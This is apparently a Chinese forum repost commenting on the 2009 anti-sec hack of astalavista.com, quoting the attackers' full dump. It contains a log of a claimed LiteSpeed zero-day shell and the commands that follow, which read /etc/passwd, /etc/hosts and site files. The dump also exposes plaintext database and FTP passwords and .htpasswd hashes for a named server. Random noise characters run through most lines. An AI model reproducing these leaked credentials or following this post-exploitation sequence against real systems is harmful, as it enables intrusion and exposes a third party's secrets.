里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。( u' i2 G; e8 r$ k* \; g/ Y. P- {
7 k: `! X) `# j( _- z: s b
[root@front3 ~]# curl -I litespeedtech.com
* c. V. c' W' z( a$ f# SHTTP/1.1 200 OK
% `0 s* X6 L/ Q9 I) h, f- Q9 \Date: Fri, 05 Jun 2009 22:54:51 GMT
: C( J1 r, q3 @7 r* fServer: LiteSpeed0 ?: u$ I8 A9 ? `
( F3 w0 \6 S. z2 ]1 z1 V: ?1 @: M
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-2 U$ z7 E( I" m! |, G
1 x5 `; l6 ?" L% F S
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
, `/ p. M8 W1 X; I" W8 s) u$ N. W2 T( }0 z% Y0 j: ~
8 \8 C: y2 @/ Y& X" O0 [
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
2 {/ q) b& L4 R% g/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
1 c3 S7 \% H( ^/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
7 G& p- j' B. U. H) C$ H\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /( z2 L8 |* n# S2 H+ Q$ j' D
\/ \/ \/ \/ \/ \/ \/3 s- S8 P) m# y: c* w/ a
The Hacking & Security Community
4 x8 @( f& T S7 T6 C[+] Founded in 1997 by a hacker computer enthusiast" P- l5 P6 Z+ J5 s5 k+ H# q2 q
[-] Exposed in 2009 by anti-sec group
5 Z2 x# k$ \, K: w" A
' B1 [9 u& A4 L- `$ l, _' n; xFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
# k% Y) [9 r% B/ |>> 03. Who’s behind the site?- I7 R5 G6 Z, Q" T4 n1 Z$ D# P
>>3 q9 m* Q0 v' ]0 Q8 \
>> A team of security and IT professionals, and a countless number of contributors from all over the world.$ X) E4 {4 E( C/ g6 f1 F
2 \7 N/ ]# Z6 \1 b- K4 U. b& S>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
- r( d+ q# W# O3 b8 \( `3 H! M>>+ g, }; N% K/ u& r. [+ c" F2 Y5 f
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
4 c+ v# U3 J5 ^& y# N0 F* Zmilitary institutions.
0 R5 k0 H: f1 b d- f3 O>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.: k7 u2 P* `: T; Z
( J+ h/ ]3 ~. @* kWhy has Astalavista been targeted?
- o( y# e2 R$ K1 l7 c' R5 i
" Z. H4 @2 m0 x9 o! d% cOther than the fact that they are not doing any of this for the “community” but0 W+ X% x4 l8 m' i8 z! z+ r
for the money, they spread exploits for kids, claim to be a security community
0 Y! K2 W! U5 |' ^9 o5 L5 V( r(with no real sense of security on their own servers), and they charge you $6.66
% s0 Q3 ^7 e- r! j% a8 ~8 ?per months to access a dead forum with a directory filled with public releases
1 O2 S. B0 ~- f7 E7 iand outdated / broken services.8 T" i2 S7 `' p: h8 x
7 l4 `; T& p& d# ^* l1 R5 w8 k
We wanted to see how good that “team of security and IT professionals” really is.
S% W) ?! V }7 M- f6 R, |
9 B+ I/ y0 t: K, eLet’s begin.! a2 ?" Y m9 L4 z! O% G
, O6 {7 v: r4 C. w. \/ z! L+ E Kanti-sec:~# ./g0tshell astalavista.com -p 80
& B) _' C7 P6 k/ `0 C* j[+] Connecting to astalavista.com:80) Y' l: T. T& Q. G- y
[+] Grabbing banner… K* f; z$ \, M- j
LiteSpeed
2 M. w, b- T6 e, |7 k* q% O[+] Injecting shellcode…
1 t" f2 E ^* t* T: l7 f* ?[-] Wait for it
3 {% I6 R/ u, ^; v- P" ]6 T0 L
[~] We g0tshell
8 Q- J, v0 v+ `uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux7 h" c) P% c8 I/ }( P6 N
ID: uid=100(apache) gid=500(apache) groups=500(apache)6 c7 z, r" G) W& a3 Y9 [0 L
2 J+ T" _9 B. ^- l2 Wsh-3.2$ cat /etc/passwd& D0 r) K, R5 {# g
root:x:0:0:root:/root:/bin/bash* s0 s9 p. y( n2 I
bin:x:1:1:bin:/bin:/sbin/nologin
8 j& p8 f7 ` r T5 o/ @daemon:x:2:2:daemon:/sbin:/sbin/nologin' C7 ~$ o5 l- K
adm:x:3:4:adm:/var/adm:/sbin/nologin
! ?) x: H; X1 I0 nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin6 y& Y6 m8 L0 r
sync:x:5:0:sync:/sbin:/bin/sync! m& x8 @' F/ R7 C# b# l
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown+ h3 ^- \* c, s5 H% |2 ~. }
halt:x:7:0:halt:/sbin:/sbin/halt
0 n$ b' w" f7 g+ Jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin& b; v! S2 t7 @. m
news:x:9:13:news:/etc/news:
4 L( ]& L' {8 U8 U1 ouucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin7 W( J7 ^1 V# [* K: X$ a- O) z
operator:x:11:0 perator:/root:/sbin/nologin
) K) n1 i5 s" s8 egames:x:12:100:games:/usr/games:/sbin/nologin- w" K6 E* H: B. v) `! y: q
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
' R3 ^) [+ B& T0 s" _. v$ X' xftp:x:14:50:FTP User:/var/ftp:/sbin/nologin) l" @$ g0 Z9 u3 K
nobody:x:99:99:Nobody:/:/sbin/nologin
; X+ X) u/ x8 z/ O2 i* h- [6 [rpm:x:37:37::/var/lib/rpm:/sbin/nologin
6 ~. e$ U9 Z6 v H- @dbus:x:81:81:System message bus:/:/sbin/nologin* ~" @' W1 Z8 q8 [! z
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- Z+ [. }% ~3 j1 V {$ |mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
# U- g) s) D7 ~# \' ?' }0 gsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin+ K. R/ x+ h" i! L2 B
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
6 `" f& g0 M! ehaldaemon:x:68:68:HAL daemon:/:/sbin/nologin1 I3 m) H$ M% A" {" U/ \ E8 `: Z
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
5 U& q' e" A1 S$ Q3 z/ _: l% [rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
2 H0 G) Y8 ?: c$ C3 A4 Znfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- v1 R* e7 ^4 ^: H( L6 V6 V2 s$ Tsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin' e; h2 i' V6 F9 a3 i. \6 }
pcap:x:77:77::/var/arpwatch:/sbin/nologin+ f3 v6 p, z9 c# ~8 T- l" l" H
named:x:25:25:Named:/var/named:/sbin/nologin- ^2 e: T: g' t. b. b [4 u
apache:x:100:500::/var/www:/bin/false1 A+ e( H! S% G& x8 T% H( m: C
diradmin:x:101:101::/usr/local/directadmin:/bin/bash5 I& X/ k0 V6 A2 ^1 d3 J- ^
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash8 Z$ W4 ^7 J( p, ~ B: l$ k
webapps:x:500:501::/var/www/html:/bin/bash
# j: I8 F9 ?& `0 _! V! Hmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- D2 {. |- c5 d( s5 u2 T( N+ Cadmin:x:501:502::/home/admin:/bin/bash
+ M$ O( z# P2 M5 hjon:x:502:503::/home/jon:/bin/bash9 ^) l/ s/ w. _% s& D& M
com:x:503:504::/home/com:/bin/bash8 V5 b/ R3 n4 l/ C8 i
ntp:x:38:38::/etc/ntp:/sbin/nologin
* [0 B+ ]# \; s' ~/ vais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
' Y5 P9 j) R1 r$ b9 S9 Kastanet:x:504:505::/home/astanet:/bin/bash0 ^- c: V# I) _" P- H8 R- |" X' }
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
, U6 Z, Z5 i; d$ ?& b7 yavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# F! m" F: [) G
$ `, o$ t% t qsh-3.2$ cat /etc/hosts3 d$ s1 G! l! L. c- s& G/ x! J1 S
# Do not remove the following line, or various programs
1 g, {' e% ~7 }3 G# that require network functionality will fail. ~; T) V+ `. o
127.0.0.1 localhost.localdomain localhost
g2 n; w' ~( p1 a5 h% H+ x! {::1 localhost6.localdomain6 localhost63 M* _1 W& {3 k0 r6 h
80.74.154.172 asta1.astalavistaserver.com6 J' F2 H. b8 g' ~7 J% a6 S1 I
. o. n$ D9 |+ b: ^4 p
sh-3.2$ pwd
8 U% n7 {9 R! }4 q( }/home/com/public_html6 I8 e) ^, p! t# G: \, d& p
5 a$ P6 f9 W1 k8 nsh-3.2$ ls -la% g: s# D. u. _' s8 u- ?9 C! w
total 184606 D) j; [. K% T, {' M
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
& H: c5 c6 }+ U$ Udrwx–x–x 11 com com 4096 Jun 25 2008 ..0 s4 j$ e: n8 w9 Z( t# E7 ?
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin k2 R) ~9 e! s
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache6 d5 a K4 C) V$ J' N2 x
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin' U; Q( R( f2 b9 u g
drwxrwxrwx 2 com com 4096 May 19 00:50 config
% m! s; V2 [; y2 w) t% ]drwxr-xr-x 2 com com 4096 Mar 20 11:05 core% A7 c R+ L, N2 }% u
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules0 y; x9 B" Y& M% h; [$ h0 R& h
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing2 C4 i9 a d. q; W S5 M7 k
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
. X% ]' X8 n" L. I- T# n k1 idrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
& }7 L* H3 F, D) H& J* f-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php7 b9 ^: _9 D( s# K" B$ f
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
6 L) f( A; n+ U( edrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
8 ? k8 e- G& p) s. u8 s6 T-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico1 o x" ^' C: A
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed7 u1 [, B( L2 J3 h
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
2 v5 F" j" X/ S+ d! G% P-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
& }( d( j$ v9 [-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak. J6 Y# f* [3 s" H
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool# c# @0 f' M- K. R, {* ~# q
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images3 w$ [7 w1 V9 j! i5 H
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php ~. ]! v/ I- u5 j
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
: h* T: c I" \7 k/ W1 rdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
5 }8 E# b+ f+ Q7 b$ N5 w$ Edrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
& }7 D" v) a. ]! X% y; k. ddrwxrwxrwx 12 com com 4096 Jun 2 07:47 media e! ?* Q: M2 w' I9 L) ]
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications3 y. ]8 F3 D9 u' f6 N
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
7 k" ^) h/ L4 e% V- A- g1 P! Idrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
* |2 a1 G, v! x; S7 d$ wdrwxrwxr-x 22 com com 4096 May 28 17:06 _new' g- V9 L# u$ g, }5 G; @/ z
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
8 X: k" w0 F/ A2 Q% Y) Ndrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
% [5 U) K$ n& Pdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
" `% T0 Z# c" ]9 t, n$ [-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
* J' d9 M5 X) Q-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml) w7 Y0 O5 h, G; B3 o! I
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
7 k6 N; M( N5 a1 K2 }! Vdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes2 X+ G+ b; A& G e/ W% n( v+ r) W
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
6 N' u5 f5 @$ V5 W; Z) {drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
1 v9 _$ V8 e" W8 V, u( q: ]$ R; l1 h2 L5 R, h
sh-3.2$ head -20 index.php
: R: E* k* F$ h<?php
: ~- o: Y' T$ i. F/ b/ S- j: R8 Q+ b- B7 r* l
/**
! D7 O: x: \, @$ H* The main page for the CMS; e& d" a8 e" F9 Y& ^( S
* @copyright CONTREXX CMS - COMVATION AG5 m, A( j. V! Q
* @author Comvation Development Team
" h/ U% d* {5 _ l* ?* @version v1.0.9.10.1 stable1 I2 G' ^1 {- m- s
* @package contrexx$ o5 i$ ~9 D$ }3 V2 }
* @subpackage core
4 n- Y+ o0 S: X1 j- {5 f2 U$ f* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage! X# q1 K* }4 ]
* @since v0.0.0.07 Z/ J3 R$ k% Q' ^
* @todo Capitalize all class names in project
3 a' y' |. V( ]$ _. S/ M* @uses /config/configuration.php
; X+ T, w: y! Q& C7 D2 A* @uses /config/settings.php
4 k7 i" r# p! a5 o7 k8 ~4 L# I* @uses /config/version.php/ d0 x' m: ^% g! ]' S' b
* @uses /core/API.php: Z! h( e7 V# N4 O
* @uses /core_modules/cache/index.class.php% r8 W: D2 p) u, i0 `6 N
* @uses /core/error.class.php; G/ k& N: o2 a R6 N0 E w
* @uses /core_modules/banner/index.class.php
) I2 b: U: C( D* @uses /core_modules/contact/index.class.php# i1 ^/ R! C' D( @# l( I: ~/ m
& J. ?- m4 d! q! ?$ {' r! ^# V
sh-3.2$ cd config/
9 K: a6 j: ~, y1 ?9 s/ M1 Ash-3.2$ ls -la
+ N! }# P3 s$ G2 n6 q' s* r: F4 {total 32
" j8 H1 |- F0 g1 |$ ^; Q( d) `drwxrwxrwx 2 com com 4096 May 19 00:50 .
' W" G' u2 K [/ Q2 R, Sdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- W- I% h4 k) }3 ~9 n( o! `-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
* G8 a: u! n& m- }; G- T-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
4 M9 p. l% |5 v# Q6 N3 p `-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
: R$ d6 k& w( l. p2 ~-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php9 k# R: R9 b. `; ^3 x& R D. r
y" Z2 ~$ q$ l1 Psh-3.2$ cat configuration.php
0 J- y9 G r1 l' w9 j* \# n4 i5 O[snip]
$ r+ e+ L; K6 |: B$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
8 l3 R- W+ B( N. |& K3 I% X$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
. i; A4 B% G) N7 w0 h7 P$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
4 L+ N5 W) b" v$ q$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
H4 {' w+ e z! S5 v; q$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
/ I8 H& X# V' @. e# l6 \: q$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)! x! u x# w+ D$ K7 C& c- J
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)& I( b0 k0 j1 l' Y/ {/ b; H
[snip]
) B, h5 V4 Y) L6 P! ^* A U3 c; p$_FTPCONFIG['is_activated'] = true; // Ftp support true or false5 A! x& _ a2 ]' Y" Q$ C# i
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode, N9 J. u c0 { z I
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
, x$ m# R, ], d1 r$ s) d1 ?7 {7 L$_FTPCONFIG['port'] = 21; // Ftp remote port5 a0 n& m" N2 o3 a: ~
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username' T. ?6 y- m! ]7 }- b1 U
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password8 `) [. X1 M/ Q
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
, ~5 A6 Z" A% ]4 G6 T0 M
+ P) Q& ?8 @4 v( Csh-3.2$ cd ..
" p. R" C: [0 @, C/ \1 j8 `* osh-3.2$ cd dvd/8 p x1 B6 u6 u
sh-3.2$ ls -la5 s, V! Q: c, f2 K; C3 t
total 2913780
* ]6 b6 y# G& ]% tdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
2 @; }. c" Q5 f+ n4 C& ndrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
. v' E" ?+ z$ H7 E3 w-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
( S; L! ]! ? \3 B% B- I-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
5 s [) N/ G+ z, |-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar( A3 l/ p$ _9 O9 ]5 F7 V1 M
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
% ?, |/ X2 z5 [
, I# W: F7 H. `- `3 Qsh-3.2$ cat .htaccess" d2 s+ w/ h2 N+ f
authType Basic* ?, w" O- G8 `3 c2 ?; x M& _
authName DVD
5 @2 C% I2 J4 o5 T9 q/ HauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
?% w( l3 G: w+ _require valid-user4 B0 q6 }1 t) I
- w& n4 L, i# C" E- Qsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 W( z. M' C. R/ I: z6 U# h# ], dDVDdownload:CRD8cuY6.MPT6
, v p" @: R% N! P, ^3 gDVDdownload2:CR8a36.wluFMg
. k c2 x+ H( a( Y+ u0 Q) v# b/ b, `, |" e1 r- _
sh-3.2$ cat test.php$ D( U W( V- F
<?php$ ?/ H: d7 s. F
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
& _9 O1 k: v* f- w P$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
/ P3 j: J5 o. s2 m8 Aecho $url;7 @# h' R0 m5 Q6 `. `
?>& Q& h: U+ ~3 i1 O6 m; U
# J0 [% `* y/ O. A9 |' Ish-3.2$ cd modifications/
- J1 j3 y+ U8 v1 f, j. b. y! Esh-3.2$ ls -la
) f) A( E. k3 ltotal 325 H$ ?' f" r s2 ^% l9 G- f" ^
drwxr-xr-x 8 com com 4096 May 11 12:48 .
1 b, G, k# Z3 M, B6 b5 f4 jdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
. O; C) D! ?8 j/ v+ m1 c* V+ Udrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng( ^; V, c% j7 e$ U
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs `; I: q7 l$ b, v0 l2 t6 i
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools, v! R2 X# E7 g6 Q ~0 P1 Y4 L
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
7 K Y Y" S2 u1 }drwxr-xr-x 2 com com 4096 Feb 2 19:33 search" @+ ~# ]( T$ Z1 o; ]# K* X
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp) ?8 |6 L/ X, q% L
9 @3 L. [+ {$ E/ q9 `, Qsh-3.2$ ls -R' Y/ ~; Y/ t. `
.:3 o5 H2 M$ } F; e
com_avtng cronjobs onlinetools pjirc search _tmp
& f% N4 t5 [7 x1 e! @
, ]) ]7 L# R: ^* q5 g3 p4 m; [./com_avtng:5 [4 ?, w8 K- d. l3 N
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts8 y k7 I) E# `1 E7 I
5 j- S' J! l9 e f
./com_avtng/scripts:3 z" e! U; O( r, d5 V. E1 n
popunder.js7 o9 D6 A1 e# E3 ]4 @8 h1 q' \
4 a t4 m# s( j( w
./cronjobs:' ^0 Y$ [% `* a2 w9 @
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
7 _2 A9 O+ q* m
: A$ ]+ j4 l1 O3 b) Q& `./cronjobs/tmp:
9 A; v$ f5 }2 G/ Wcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv' g" O; e1 a- c9 d& r6 E" m5 m
* A( A. `; q" H% y+ y' ?./onlinetools:# Z+ N4 a& w1 k' ~- A( J& P
index.php. i$ }& b- T% R
4 j8 O L, @/ H3 B$ `, m3 r; C3 I7 G5 ]
./pjirc:
7 s) m2 z" q0 ~2 c' E/ i! ga_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
# y' c. _$ u0 g, f2 n# u/ ^: PAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
" G9 [+ k6 H/ d$ i1 ubackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
! r( l2 ^( i: j$ d2 j3 D D9 u. r8 P; M4 C' G0 `
./pjirc/img:
" }. {/ w% [2 v) ^! W( R2 aange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif" {) h& B r. \( K. I. W
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 8 I2 u: \# W3 \
verre-eau.gif
0 X; j/ n/ Q2 O* ~2 ~argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
4 k1 P1 u. u- D5 `/ g* lverre-vin.gif
6 H- a- |$ X6 A) }: E2 pballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif+ f$ g+ Z! K' |* N7 L' [
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
, D8 E$ e# c, ~1 X( G/ K) \6 I6 Z/ z# G. ~6 _5 Q; Q3 a$ H* a
./pjirc/snd:
4 N4 o% J3 w# x& {: H- F: J6 Bbell2.au ding.au
F& \$ f* f1 |1 G) ?; y$ Y4 C7 K; I [. n+ u" S* I2 }+ S- m& K
./search:8 x0 F6 Z% j$ z7 @
searchEngines.php search.php
6 D0 d' q% `2 B5 a- m' j' x
* O% ?( r5 x5 \ e./_tmp:
P R) ^$ C! cdefaultPorts.php defaultPorts.txt" Q. b y, b% Y5 t
% j8 h% c% L$ U# {/ Ush-3.2$ cd cronjobs/5 g3 P+ S- L+ L2 O, U
sh-3.2$ cat exploits.php
& |0 Y1 e& [( r[snip]: o# W' c8 }- T% k7 }+ h1 n
$categories = array();9 _5 d* i( e" c0 K! W1 ^
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
$ r1 v" }! {! z& {8 z* d# ^7 _$expolits = file($milw0rmFile);$ ~$ U. i2 F- d: G3 Q
$comExploits = array();' R6 P0 t: T( `0 T
[snip]
' [; u. i: O% z6 y$ x, l$ \// manage data
& A d, U3 s0 t7 ?9 `/ {* M; s% i* Cfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
% \8 T' O! z$ J) z+ D4 ?# n# G
5 j2 x5 A* [& ^1 {, a // get path and title
1 a; \# F! }0 F5 F $expolits[$x] = trim($expolits[$x]);
- Q) m# N/ d; a, A $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
* Y" k" L; F3 D. n% p0 ` $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
; O* P' _* G( P* k# |+ E
0 }0 K) Q& E( z+ Q% e // check if file exists! \& F6 p$ m+ \& G" O3 U
if (file_exists($path)) {
; N: B7 p2 ^7 r( N( R+ R0 B. o% a) ^4 C: B& L2 F1 J. B2 D, |# n
$text = file_get_contents($path);
! u; Z. D& p1 [ c& z# l
# x* g9 _* Y! l/ b: R // get content and date# O# H' q5 Q1 N8 K- x( c! i
//$text = htmlspecialchars($text, ENT_QUOTES);
/ k$ d9 A$ |1 G6 l! F" B $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
$ j- D% W: Y$ ?2 f0 P' ^4 q9 } if ($tmptext != ”) {# A) M$ u3 Q, x6 [4 [/ E5 @
$text = $tmptext;
7 w7 c$ q+ E! Q8 r `" P0 h } else {
' P, G* y0 v( r7 j$ F! k $text = addslashes(htmlentities($text, ENT_QUOTES));
0 Q& g6 e. J9 E* H4 A }! ~4 l$ E; k' y0 a
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
0 y% ]' c% Z f6 `3 V1 r; E% } $tmp = explode('-', $date);. \; Y2 S$ K: P0 `3 j! g
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));6 t' F/ b/ Z! W j% k$ t
$cat = getCategory ($path);) t) z T& `9 k) s/ g( z
$ext = pathinfo(basename($path));# R* N# ]2 n; V. a
$ext = $ext['extension'];% [( j$ @. H; ]( V3 U# S8 w
$qStr = ”
9 _1 P$ M6 a9 k/ U. D SELECT `id` ^7 n ~7 z* h4 S( f
FROM `contrexx_module_exploits`. A4 L' x n6 K4 ?8 x1 v
WHERE `title` = ‘” . $title . “‘
# j* c3 X, N6 C9 v' d/ t4 C R( o AND `date` = ‘” . $date . “‘
, M& N; e$ W/ s0 u' X “;# \! R- J* H! O' g% N2 T+ L/ O
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
+ O4 O, X& g" J- i2 c9 `- `4 r $q = $_objDB->query($qStr);, T" k5 u2 E4 w
+ y- z4 S7 {: i+ f% q+ B2 O
if ($q->numRows() == 0) {& s" J% Y1 [) L, c# w& d2 y3 s
( y/ m( I/ w) `( {7 b+ N // prepare array3 g0 b1 h# g4 m) Z
$comExploits[$x]['date'] = $date;
+ @+ Y6 u, v) D $comExploits[$x]['title'] = $title;
# v6 R: ]7 q! H& Y $comExploits[$x]['author'] = ‘milw0rm’;
$ t- X2 n# C; }& s6 P2 F8 q $comExploits[$x]['text'] = $text;
- c! I/ c$ C8 E$ Y; u$ W& W $comExploits[$x]['source'] = $ext;' d l8 \4 B- L' N" ~
$comExploits[$x]['url1'] = ”;5 f) h( {( z+ n; K" P( p6 t7 V1 E3 [
$comExploits[$x]['url2'] = ”;* F N( Q: Q( j$ I8 f
$comExploits[$x]['catid'] = $cat;7 Z4 g8 y: S0 I& O" e
$comExploits[$x]['lang'] = ‘2′;' s8 H1 y$ }, {
$comExploits[$x]['userid'] = ‘12′;
, p2 p# N( y- E9 N3 d $comExploits[$x]['startdate'] = ‘0000-00-00′;
1 Z: e. ^8 X- I; l% f $comExploits[$x]['enddate'] = ‘0000-00-00′;' G3 @% `2 @, y: i. {* a
$comExploits[$x]['status'] = ‘1′;& Y8 C4 X/ f1 p; g8 f
$comExploits[$x]['changelog'] = $date;+ ~5 g' y& T! i# P& s8 g
$ D2 ^& o2 y; m) L$ J. l3 L
}
8 J0 J. x$ b* K! o: X/ G[snip]
+ |% C \: l( y7 j% ` $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>) {) E' Q4 U1 a) {- y
<rss version=”2.0″>
; E7 h* x% N Z8 a <channel>
; S% }# `& N; j5 U% i. L' h$ v <title>ASTALAVISTA.com - Exploits</title>
( s" u6 h; ^) ?+ b: F <link>http://www.astalavista.com/exploits</link> s% X8 K, W" S2 Y9 z
